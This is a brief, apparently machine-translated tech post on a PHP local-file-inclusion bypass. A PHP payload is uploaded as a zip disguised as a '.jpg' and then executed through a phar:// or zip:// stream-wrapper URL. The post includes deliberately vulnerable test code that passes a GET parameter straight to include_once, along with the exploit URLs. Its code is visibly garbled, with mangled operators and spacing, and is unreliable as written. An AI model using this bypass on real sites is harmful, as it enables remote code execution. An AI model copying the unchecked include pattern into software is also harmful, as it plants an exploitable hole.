Shulou(Shulou.com)06/01 Report--

$include_file is controllable and can upload files. The upload suffix is limited to jpg,gif,png, and the suffix limit must be .php.

Allow_url_include=Off (regardless of remote inclusion)

If (isset ($include_file) & & strtolower (substr ($include_file,-4)) = ".php") {include_once ($include_file);}

Solution

Required php > = 5.3

Package php into zip and upload it with a renamed name, such as info.zip.jpg.

It is then included with a phar stream wrapper, where info.zip.jpg is the zip file name and info.php is the sub-file name within the zip package

Http://localhost/index.php?a=phar://info.zip.jpg/info.php

Test the code:

Echo "ini_get (allow_url_include):" .ini _ get ("allow_url_include"). "; $include_file=$_GET ['a']; if (isset ($include_file) & & strtolower (substr ($include_file,-4)) = =" .php ") {include_once ($include_file);} else {echo" file err ";}

Reference document: http://php.net/manual/zh/phar.using.stream.php

PS.

According to the php official documentation, at least php5.3 is required to use it, and an extension is needed before 5.3.

If it doesn't work, you can also try the zip stream wrapper (which requires a zip extension) and pay attention to escaping the pound sign:

Zip://info.zip.jpg#info.php

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.